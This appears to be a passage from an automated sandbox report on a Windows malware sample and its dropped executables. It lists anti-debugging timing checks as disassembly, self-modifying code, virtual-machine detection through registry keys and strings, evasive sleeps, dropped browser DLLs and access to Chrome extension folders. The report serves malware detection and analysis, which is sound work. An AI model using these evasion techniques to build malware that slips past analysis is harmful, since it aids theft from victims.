Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: CDDD8E second address: CDDD9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007FF0BC8515D6h 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: CE0121 second address: CE016B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BC8515E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xor dword ptr [esp], 68DD7A9Bh 0x00000011 js 00007FF0BC8515D6h 0x00000017 lea ebx, dword ptr [ebp+12454E62h] 0x0000001d mov dword ptr [ebp+122D2B95h], eax 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FF0BC8515E8h 0x0000002b rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: CE01D7 second address: CE0223 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FF0BCB462B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d call 00007FF0BCB462BAh 0x00000012 add dword ptr [ebp+122D1C9Eh], esi 0x00000018 pop ecx 0x00000019 push 00000000h 0x0000001b jmp 00007FF0BCB462C9h 0x00000020 mov dx, 4091h 0x00000024 call 00007FF0BCB462B9h 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: CE0223 second address: CE022D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF0BC8515D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: CE0232 second address: CE0286 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push ecx 0x00000009 jmp 00007FF0BC8515DDh 0x0000000e pop ecx 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 pushad 0x00000014 pushad 0x00000015 push eax 0x00000016 pop eax 0x00000017 jmp 00007FF0BC8515E4h 0x0000001c popad 0x0000001d push eax 0x0000001e pushad 0x0000001f popad 0x00000020 pop eax 0x00000021 popad 0x00000022 mov eax, dword ptr [eax] 0x00000024 jmp 00007FF0BC8515DBh 0x00000029 mov dword ptr [esp+04h], eax 0x0000002d push eax 0x0000002e push edx 0x0000002f jns 00007FF0BC8515D8h 0x00000035 push edx 0x00000036 pop edx 0x00000037 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: CF2C37 second address: CF2C3D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: CFF8EA second address: CFF912 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BCB462C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007FF0BCB462C3h 0x0000000f jmp 00007FF0BCB462BBh 0x00000014 push edx 0x00000015 pop edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: CFF912 second address: CFF925 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FF0BC8515DEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: CFFA4D second address: CFFA72 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF0BCB462B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF0BCB462C7h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: CFFBAD second address: CFFBC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF0BC8515E8h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: D00162 second address: D0016A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: D0016A second address: D001AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BC8515E8h 0x00000007 jmp 00007FF0BC8515E7h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FF0BC8515DFh 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: D001AE second address: D001B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: D009F4 second address: D00A0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FF0BC8515D6h 0x0000000a pushad 0x0000000b popad 0x0000000c push edi 0x0000000d pop edi 0x0000000e popad 0x0000000f jl 00007FF0BC8515D8h 0x00000015 push esi 0x00000016 pop esi 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: D00A0B second address: D00A23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FF0BCB462BEh 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: D00A23 second address: D00A3B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jg 00007FF0BC8515D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: D00A3B second address: D00A47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 js 00007FF0BCB462B6h 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: D00D96 second address: D00D9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: D01F40 second address: D01F44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: D039CA second address: D039CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: D08042 second address: D0806A instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF0BCB462C5h 0x00000008 jmp 00007FF0BCB462BFh 0x0000000d push eax 0x0000000e pushad 0x0000000f popad 0x00000010 jns 00007FF0BCB462B6h 0x00000016 pop eax 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: D0806A second address: D08079 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FF0BC8515D6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: D08079 second address: D08081 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: D08081 second address: D08088 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: D0C7D5 second address: D0C7F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BCB462C8h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: D0C7F5 second address: D0C7F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: CCB8DB second address: CCB8DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: D0BEB1 second address: D0BED8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007FF0BC8515D6h 0x0000000e jmp 00007FF0BC8515E9h 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: D0BED8 second address: D0BEDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: D0C4DF second address: D0C4EB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jo 00007FF0BC8515D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: D0C4EB second address: D0C505 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FF0BCB462C4h 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: D0C6AC second address: D0C6BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BC8515DAh 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: D0F99D second address: D0F9A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: D0F9A3 second address: D0F9DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d jl 00007FF0BC8515EEh 0x00000013 jmp 00007FF0BC8515E8h 0x00000018 mov eax, dword ptr [esp+04h] 0x0000001c push eax 0x0000001d push edx 0x0000001e jnl 00007FF0BC8515D8h 0x00000024 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: D0F9DC second address: D0FA32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push edx 0x0000000b jmp 00007FF0BCB462C7h 0x00000010 pop edx 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 jmp 00007FF0BCB462C8h 0x0000001a pop eax 0x0000001b jmp 00007FF0BCB462BDh 0x00000020 push 71AA9882h 0x00000025 pushad 0x00000026 push esi 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: D101D1 second address: D101DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FF0BC8515D6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: D10B3F second address: D10B43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: D10B43 second address: D10B98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007FF0BC8515D8h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 0000001Ah 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 movsx esi, di 0x00000027 xchg eax, ebx 0x00000028 jmp 00007FF0BC8515DAh 0x0000002d push eax 0x0000002e push eax 0x0000002f push edx 0x00000030 push edi 0x00000031 jmp 00007FF0BC8515E6h 0x00000036 pop edi 0x00000037 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: D110C7 second address: D110E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FF0BCB462C6h 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: D11B44 second address: D11B48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: D11B48 second address: D11B4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: B5E933 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: D01DB3 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: B5C422 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: D2DB8F instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: D93962 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Special instruction interceptor: First address: B5E933 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Special instruction interceptor: First address: D01DB3 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Special instruction interceptor: First address: B5C422 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Special instruction interceptor: First address: D2DB8F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Special instruction interceptor: First address: D93962 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Special instruction interceptor: First address: 8A3B15 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Special instruction interceptor: First address: 8A3BBD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Special instruction interceptor: First address: A4D06A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Special instruction interceptor: First address: A70591 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Special instruction interceptor: First address: ACF690 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Special instruction interceptor: First address: 6D3B15 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Special instruction interceptor: First address: 6D3BBD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Special instruction interceptor: First address: 87D06A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Special instruction interceptor: First address: 8A0591 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Special instruction interceptor: First address: 8FF690 instructions caused by: Self-modifying code
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_054E0C1C rdtsc 0_2_054E0C1C
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread delayed: delay time: 180000 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Local\Temp\1000053001\8eb30d7f71.exe Window / User API: threadDelayed 2064 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll Jump to dropped file
Found large amount of non-executed APIs
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe API coverage: 0.3 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7736 Thread sleep time: -34017s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7732 Thread sleep count: 32 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7732 Thread sleep time: -64032s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7696 Thread sleep count: 274 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7696 Thread sleep time: -8220000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7720 Thread sleep time: -60030s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7812 Thread sleep time: -180000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7712 Thread sleep count: 34 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7712 Thread sleep time: -68034s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7728 Thread sleep time: -60030s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7716 Thread sleep count: 32 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7716 Thread sleep time: -64032s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7696 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe TID: 8000 Thread sleep count: 116 > 30 Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe TID: 8000 Thread sleep time: -696000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000053001\8eb30d7f71.exe TID: 8168 Thread sleep count: 2064 > 30 Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1000053001\8eb30d7f71.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1000053001\8eb30d7f71.exe Last function: Thread delayed
Sleep loop found (likely to delay execution)
Source: C:\Users\user\AppData\Local\Temp\1000053001\8eb30d7f71.exe Thread sleep count: Count: 2064 delay: -10 Jump to behavior
Source: C:\Users\user\Desktop\file.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C8EC930 GetSystemInfo,VirtualAlloc,GetSystemInfo,VirtualFree,VirtualAlloc, 7_2_6C8EC930
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: explorti.exe, explorti.exe, 00000006.00000002.2880337631.0000000000CE5000.00000040.00000001.01000000.00000007.sdmp, eb98fe5174.exe, eb98fe5174.exe, 00000007.00000002.2620268585.0000000000A2C000.00000040.00000001.01000000.00000009.sdmp, 53c7d901f1.exe, 00000008.00000002.2648279906.000000000085C000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.1732026554.0000000001624000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: explorti.exe, 00000006.00000002.2882067749.00000000015AA000.00000004.00000020.00020000.00000000.sdmp, eb98fe5174.exe, 00000007.00000002.2639639180.0000000000FF7000.00000004.00000020.00020000.00000000.sdmp, eb98fe5174.exe, 00000007.00000002.2639639180.0000000001024000.00000004.00000020.00020000.00000000.sdmp, 53c7d901f1.exe, 00000008.00000002.2653239563.0000000001023000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: 53c7d901f1.exe, 00000008.00000002.2653239563.0000000000FAE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: eb98fe5174.exe, 00000007.00000002.2639639180.0000000001024000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW*
Source: file.exe, 00000000.00000002.1731373345.0000000000CE5000.00000040.00000001.01000000.00000003.sdmp, explorti.exe, 00000001.00000002.1764865027.0000000000CE5000.00000040.00000001.01000000.00000007.sdmp, explorti.exe, 00000002.00000002.1765716826.0000000000CE5000.00000040.00000001.01000000.00000007.sdmp, explorti.exe, 00000006.00000002.2880337631.0000000000CE5000.00000040.00000001.01000000.00000007.sdmp, eb98fe5174.exe, 00000007.00000002.2620268585.0000000000A2C000.00000040.00000001.01000000.00000009.sdmp, 53c7d901f1.exe, 00000008.00000002.2648279906.000000000085C000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: explorti.exe, 00000006.00000002.2882067749.0000000001579000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW`
Source: 53c7d901f1.exe, 00000008.00000002.2653239563.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW(l
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger Jump to behavior
